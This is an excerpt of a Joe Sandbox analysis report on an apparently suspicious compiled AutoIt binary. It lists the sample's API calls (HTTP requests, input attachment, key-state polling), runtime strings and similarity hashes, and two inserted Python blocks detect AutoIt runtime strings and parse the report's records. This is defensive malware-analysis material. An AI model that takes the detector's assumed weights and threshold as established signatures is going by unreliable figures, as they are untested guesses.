                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                          • String ID: Ping
                                          • API String ID: 1028309954-2246546115
                                          • Opcode ID: 2501be166c4958f64cbc12494b6fafc744b424405d8c91d479787ceb8add7225
                                          • Instruction ID: a934fd4e5c16a680a1b7de5626ec4c7349ba41d9153cb0317ba1b4f5e9cdfe7b
                                          • Opcode Fuzzy Hash: 2501be166c4958f64cbc12494b6fafc744b424405d8c91d479787ceb8add7225
                                          • Instruction Fuzzy Hash: 5591AC34608201DFD724DF15D689F1ABBE0EF48318F1495AEE469AB6A2C731ED46CF81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$BuffCharLower
                                          • String ID: cdecl$none$stdcall$winapi
                                          • API String ID: 707087890-567219261
                                          • Opcode ID: 6e74fbf46b8306b90543d4e65272cda32b53a6383d5edb8cc7404a0c7a1fa702
                                          • Instruction ID: 3339b709c0a213b7b03b38cf2a9e9dc7cb5fb9e6c833d71dea169b2d9cb2cc65
                                          • Opcode Fuzzy Hash: 6e74fbf46b8306b90543d4e65272cda32b53a6383d5edb8cc7404a0c7a1fa702
                                          • Instruction Fuzzy Hash: FC518D31A001169ACB14DF68CB50ABEB7E5AF64328B20522DE426F72C5DB32ED42C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                          • API String ID: 636576611-1287834457
                                          • Opcode ID: bdb725454fe020780ea25b7111cae830fc245dc0250e74ec6e96070d4f60c429
                                          • Instruction ID: e9d7b0446c6a16912fa1cb3767fc1d4af5852fa2e44968ab67c3ff090f670d5d
                                          • Opcode Fuzzy Hash: bdb725454fe020780ea25b7111cae830fc245dc0250e74ec6e96070d4f60c429
                                          • Instruction Fuzzy Hash: 7261BD71608301AFD314DF64D988F9ABBE4EF49714F10980EF985AB291C771EE49CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLocalTime.KERNEL32 ref: 00EB8257
                                          • SystemTimeToFileTime.KERNEL32 ref: 00EB8267
                                          • LocalFileTimeToFileTime.KERNEL32 ref: 00EB8273
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EB8310
                                          • SetCurrentDirectoryW.KERNEL32 ref: 00EB8324
                                          • SetCurrentDirectoryW.KERNEL32 ref: 00EB8356
                                          • SetCurrentDirectoryW.KERNEL32 ref: 00EB838C
                                          • SetCurrentDirectoryW.KERNEL32 ref: 00EB8395
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CurrentDirectoryTime$File$Local$System
                                          • String ID: *.*
                                          • API String ID: 1464919966-438819550
                                          • Opcode ID: c753f7f1a1c615a18d02a1b5ada9234e975bb21eeedf9f1e7406e780320d50e2
                                          • Instruction ID: f7ed375c8c6cad6828da5ca2b102b2d51f1c4282a4b2064a14955e08dc69fd39
                                          • Opcode Fuzzy Hash: c753f7f1a1c615a18d02a1b5ada9234e975bb21eeedf9f1e7406e780320d50e2
                                          • Instruction Fuzzy Hash: EB616A725043059FC710EF64D84099FB3EDFF89314F04591AF989A7251EB35E909CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00EB33CF
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00EB33F0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: LoadString$_wcslen
                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                          • API String ID: 4099089115-3080491070
                                          • Opcode ID: 3c08b6af42e307bab3e9dbb9d0e5cc08b6d7bd5a9952ba0d063397227a261e9f
                                          • Instruction ID: d7190169f1d8b9aa70a09650f4b59cfb2f1075d947c484973b5de2579d271f8a
                                          • Opcode Fuzzy Hash: 3c08b6af42e307bab3e9dbb9d0e5cc08b6d7bd5a9952ba0d063397227a261e9f
                                          • Instruction Fuzzy Hash: B151A272D00209AADF15EBE0ED46EEEB3B9EF08340F205165F51572092EB356F58EB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%
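Added example, not part of the report and not Joe Sandbox or AutoIt code: a small Python triage check that reuses the runtime strings listed in the records above (the "AutoIt v3 GUI" window class, the "Incorrect parameters to object property !" and "Failed to create object" error text, the cdecl/stdcall/winapi calling-convention keywords) to decide whether a memory dump is a compiled AutoIt v3 binary, which is the conclusion the report's own "Binary is likely a compiled AutoIt script file" signature reaches. Because the runtime hands these strings to wide-character APIs (LoadStringW, RegisterClassExW), the scan looks for both ASCII and UTF-16LE encodings. The weights, the verdict threshold and the sample buffer are this example's own assumptions, constructed here so the code runs offline.

```python
"""Flag a memory dump as a compiled AutoIt v3 runtime from its known strings.

Added example; not Joe Sandbox or AutoIt code. Indicator strings come from the
function records of the sandbox report; weights and threshold are assumed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Strings copied from the report's String IDs. Weights are an assumption of this
# example: the GUI class name and the object-property error text are specific to
# the AutoIt runtime; the lowercase calling-convention keywords are weak alone.
INDICATORS: dict[str, int] = {
    "AutoIt v3 GUI": 3,
    "Incorrect parameters to object property !": 3,
    "Failed to create object": 1,
    "NULL Pointer assignment": 1,
    "winapi": 1,
    "stdcall": 1,
    "cdecl": 1,
}
VERDICT_THRESHOLD = 4  # assumed: one strong hit plus corroboration
ENCODINGS = ("ascii", "utf-16le")  # wide APIs see UTF-16LE; ASCII copies also occur


@dataclass(frozen=True)
class Hit:
    offset: int
    encoding: str
    indicator: str


def find_hits(buf: bytes) -> list[Hit]:
    """Return every occurrence of an indicator, in either encoding, by offset."""
    hits: list[Hit] = []
    for indicator in INDICATORS:
        for enc in ENCODINGS:
            pattern = re.compile(re.escape(indicator.encode(enc)))
            for m in pattern.finditer(buf):
                hits.append(Hit(m.start(), enc, indicator))
    return sorted(hits, key=lambda h: h.offset)


def score(hits: list[Hit]) -> int:
    """Count each distinct indicator once, regardless of encoding or repeats,
    so a string duplicated across sections cannot inflate the verdict."""
    return sum(INDICATORS[name] for name in {h.indicator for h in hits})


def is_autoit_runtime(buf: bytes) -> bool:
    return score(find_hits(buf)) >= VERDICT_THRESHOLD


def constructed_sample() -> bytes:
    """Constructed input for this example (not a real dump): filler bytes around
    two UTF-16LE runtime strings and one ASCII keyword."""
    return (
        b"\x00" * 16
        + "AutoIt v3 GUI".encode("utf-16le")
        + b"\x00" * 8
        + "Incorrect parameters to object property !".encode("utf-16le")
        + b"MZ\x90\x00"
        + b"stdcall"
        + b"\x00" * 4
    )


if __name__ == "__main__":
    sample = constructed_sample()
    for hit in find_hits(sample):
        print(f"0x{hit.offset:08x} {hit.encoding:9s} {hit.indicator!r}")
    print("score:", score(find_hits(sample)), "autoit:", is_autoit_runtime(sample))
```

To use it on a real artifact, read one of the .sdmp files listed under Memory Dump Source into `buf` and call `is_autoit_runtime(buf)`; the per-hit offsets from `find_hits` are what you would carry into a YARA rule or a memory-scanner signature.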

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$BuffCharUpper
                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                          • API String ID: 1256254125-769500911
                                          • Opcode ID: e1782025a3b2838c75b98c32b0351370c4c6278639a2e965d73207f51e8916f8
                                          • Instruction ID: 97223d1f27c8c40dfa3129a70fad2361a066279bc4cbae0465fd4efbd5ae2c10
                                          • Opcode Fuzzy Hash: e1782025a3b2838c75b98c32b0351370c4c6278639a2e965d73207f51e8916f8
                                          • Instruction Fuzzy Hash: B241EC32A000279BCB105F7DC8905BE77E5AFEA758B245229E421FF286E731DD81D790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00EB53A0
                                          • GetDiskFreeSpaceW.KERNEL32 ref: 00EB5416
                                          • GetLastError.KERNEL32 ref: 00EB5420
                                          • SetErrorMode.KERNEL32(00000000), ref: 00EB54A7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Error$Mode$DiskFreeLastSpace
                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                          • API String ID: 4194297153-14809454
                                          • Opcode ID: 66080c257d91e04a68380c5e0f189d1bf3b751b5830d9ac7343956cdc4b26ece
                                          • Instruction ID: 0bbb4fc5ee9c83fd06890bc0d1ba6193be72887f5061cb1e4f5a4afd4c2a329d
                                          • Opcode Fuzzy Hash: 66080c257d91e04a68380c5e0f189d1bf3b751b5830d9ac7343956cdc4b26ece
                                          • Instruction Fuzzy Hash: 2A31B036A006059FD710DF68D884BEBBBF4EF45309F149066E416EB292DB71DD86CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00EAB151
                                          • GetForegroundWindow.USER32 ref: 00EAB165
                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00EAB16C
                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00EAB17B
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EAB18D
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00EAB1A6
                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00EAB1B8
                                          • AttachThreadInput.USER32(00000000,00000000), ref: 00EAB1FD
                                          • AttachThreadInput.USER32(?,?,00000000), ref: 00EAB212
                                          • AttachThreadInput.USER32(00000000,?,00000000), ref: 00EAB21D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                          • String ID:
                                          • API String ID: 2156557900-0
                                          • Opcode ID: 04ad2d3224992846975bc28a5c81e2d6e5859f776144f2f1f35fd4fbd7369c98
                                          • Instruction ID: f0822bf3b4f0d7e82295bd6f07cec7db2943c219d6b01ddf250a87c85db891df
                                          • Opcode Fuzzy Hash: 04ad2d3224992846975bc28a5c81e2d6e5859f776144f2f1f35fd4fbd7369c98
                                          • Instruction Fuzzy Hash: E431C371501208BFDB109F25EC44BAD7BA9FB5A399F219006F911FA1A1D7B4AD40CF70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 0ea7052e6284c5cdb9968ca086c152bb3e670ea06441eb6623965e2d45fb8f9e
                                          • Instruction ID: 3a2aae6ce47a1cb69755843b8c97b571b5a9609d963a5aa2637e0a22983ddb2f
                                          • Opcode Fuzzy Hash: 0ea7052e6284c5cdb9968ca086c152bb3e670ea06441eb6623965e2d45fb8f9e
                                          • Instruction Fuzzy Hash: B511A776500108AFCB02EF64D842CDD7BA5FF45350F4594A9FB4C6F222D631EE909B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E41459
                                          • OleUninitialize.OLE32 ref: 00E414F8
                                          • UnregisterHotKey.USER32(?), ref: 00E416DD
                                          • DestroyWindow.USER32 ref: 00E824B9
                                          • FreeLibrary.KERNEL32 ref: 00E8251E
                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E8254B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                          • String ID: close all
                                          • API String ID: 469580280-3243417748
                                          • Opcode ID: ea8927e514f49a25c849ff8b3c5be980ee2c682b2767cb6e8ce18228b879924d
                                          • Instruction ID: 247d0ed9c3b6ab31c48383703fe400d250eeeb04436db2860942dca53c3ab03f
                                          • Opcode Fuzzy Hash: ea8927e514f49a25c849ff8b3c5be980ee2c682b2767cb6e8ce18228b879924d
                                          • Instruction Fuzzy Hash: 66D18A307012128FCB19EF15E499A69F7A0BF05304F2462AEE94E7B262DB30EC52CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00EB35E4
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                          • LoadStringW.USER32(00F12390,?,00000FFF,?), ref: 00EB360A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: LoadString$_wcslen
                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                          • API String ID: 4099089115-2391861430
                                          • Opcode ID: f94a393468cf298b46d49bdcb374926ecafdedfd1f8a5570ad2780746c09d554
                                          • Instruction ID: 062f3bf06dacd8b8dbb4651591184ac011de47535affbf2acf854f7c22fb30d0
                                          • Opcode Fuzzy Hash: f94a393468cf298b46d49bdcb374926ecafdedfd1f8a5570ad2780746c09d554
                                          • Instruction Fuzzy Hash: 5F517171D00219BADF15EBA0EC42EEEBBB4EF04304F146125F51572192DB316B99DFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E59BB2
                                            • Part of subcall function 00E5912D: GetCursorPos.USER32(?), ref: 00E59141
                                            • Part of subcall function 00E5912D: ScreenToClient.USER32(00000000,?), ref: 00E5915E
                                            • Part of subcall function 00E5912D: GetAsyncKeyState.USER32 ref: 00E59183
                                            • Part of subcall function 00E5912D: GetAsyncKeyState.USER32 ref: 00E5919D
                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00ED8B6B
                                          • ImageList_EndDrag.COMCTL32 ref: 00ED8B71
                                          • ReleaseCapture.USER32 ref: 00ED8B77
                                          • SetWindowTextW.USER32 ref: 00ED8C12
                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00ED8C25
                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00ED8CFF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                          • API String ID: 1924731296-2107944366
                                          • Opcode ID: 395c5698c7a2297fecf1b8fa5d1284b5133af0da7c964130e5bf13cff2c36e02
                                          • Instruction ID: a169a562c1efb29a4ca07d099ee420b6cc4e5d740f2ed2207c0960e94d552e00
                                          • Opcode Fuzzy Hash: 395c5698c7a2297fecf1b8fa5d1284b5133af0da7c964130e5bf13cff2c36e02
                                          • Instruction Fuzzy Hash: 5451BD70205304AFD714DF14ED56FAAB7E4FB88754F50162EFA52A72E2CB709908CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EBC272
                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EBC29A
                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EBC2CA
                                          • GetLastError.KERNEL32 ref: 00EBC322
                                          • SetEvent.KERNEL32 ref: 00EBC336
                                          • InternetCloseHandle.WININET(00000000), ref: 00EBC341
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                          • String ID:
                                          • API String ID: 3113390036-3916222277
                                          • Opcode ID: 9014e2d29b3639eae70fa05e23f8fbe997609ae97b66f551bc5af3af50d66ebe
                                          • Instruction ID: 60db359300a64e65523e288ee972d3946d387bf5b4953c92321809d92e7aae95
                                          • Opcode Fuzzy Hash: 9014e2d29b3639eae70fa05e23f8fbe997609ae97b66f551bc5af3af50d66ebe
                                          • Instruction Fuzzy Hash: 17319171608608AFD7219F659C84AEB7BFCEB49784B64951EF486F2210DB34DD058B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%
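
Records like the WinINet one above list each function's imports, referenced strings and fuzzy hashes in a fixed layout, but the page gives no way to pivot on them. The following parser is an added example, not part of the Joe Sandbox report or its IDA plugin: it turns that layout into structured records so the direct API call sequence, the '$'-joined String ID and the Opcode ID / API String ID can be compared across reports. It assumes only the layout visible on this page; the SAMPLE constant is copied from two of this page's records and trimmed, and the "Download File" suffix it strips from the Associated entries is link text that the HTML rendering fused onto them.

```python
"""Parse Joe Sandbox 'IDA Plugin' function records, as rendered in the report page, into
structured data (added example, not Joe Sandbox code; SAMPLE is copied from this page)."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Matches "SetErrorMode.KERNEL32(00000001), ref: 00EB53A0", "GetLastError.KERNEL32 ref: ..."
# and "Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD" (indented sub-calls).
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")

SECTIONS = {"APIs": "apis", "Strings": "strings", "Memory Dump Source": "dump",
            "Joe Sandbox IDA Plugin": "plugin", "Similarity": "similarity",
            "Uniqueness": "uniqueness"}   # header lines as printed; "APIs" opens a record

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                        # call-site address
    subcall_of: int | None = None   # set when the call is made inside a callee

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    dump: dict = field(default_factory=dict)        # Source File / Associated
    similarity: dict = field(default_factory=dict)  # API ID, String ID, hashes
    uniqueness: float | None = None

    @property
    def api_sequence(self) -> list[str]:
        """Direct imports in call order, e.g. 'InternetOpenUrlW.WININET'."""
        return [f"{c.name}.{c.module}" for c in self.apis if c.subcall_of is None]

    @property
    def strings(self) -> list[str]:
        """'String ID' is '$'-joined; an empty field means no referenced strings."""
        return [s for s in self.similarity.get("String ID", "").split("$") if s]

def parse_records(text: str) -> list[FunctionRecord]:
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or (rec is None and line not in SECTIONS):
            continue
        if line in SECTIONS:
            section = SECTIONS[line]
            if section == "apis":
                rec = FunctionRecord()
                records.append(rec)
            continue
        if line.startswith("Uniqueness Score:"):
            rec.uniqueness = float(line.split(":", 1)[1].strip().rstrip("%"))
            continue
        bullet = line.lstrip("•").strip()
        if section == "apis":
            m = API_RE.match(bullet)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                rec.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                        int(m["sub"], 16) if m["sub"] else None))
        elif section in ("dump", "similarity") and ":" in bullet:
            key, _, value = bullet.partition(":")
            # "Download File" is link text fused onto each Associated entry in the HTML.
            key, value = key.strip(), value.strip().removesuffix("Download File")
            target = rec.dump if section == "dump" else rec.similarity
            if key == "Associated":
                target.setdefault(key, []).append(value)
            else:
                target[key] = value
    return records

def functions_calling(records: list[FunctionRecord], api: str) -> list[FunctionRecord]:
    return [r for r in records if api in {c.name for c in r.apis if c.subcall_of is None}]

SAMPLE = """
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00EB53A0
• GetDiskFreeSpaceW.KERNEL32 ref: 00EB5416
• SetErrorMode.KERNEL32(00000000), ref: 00EB54A7
Memory Dump Source
• Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: 66080c257d91e04a68380c5e0f189d1bf3b751b5830d9ac7343956cdc4b26ece
Uniqueness Score: -1.00%
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EBC272
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EBC29A
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EBC2CA
• InternetCloseHandle.WININET(00000000), ref: 00EBC341
Similarity
• String ID:
• API String ID: 3113390036-3916222277
Uniqueness Score: -1.00%
"""
```

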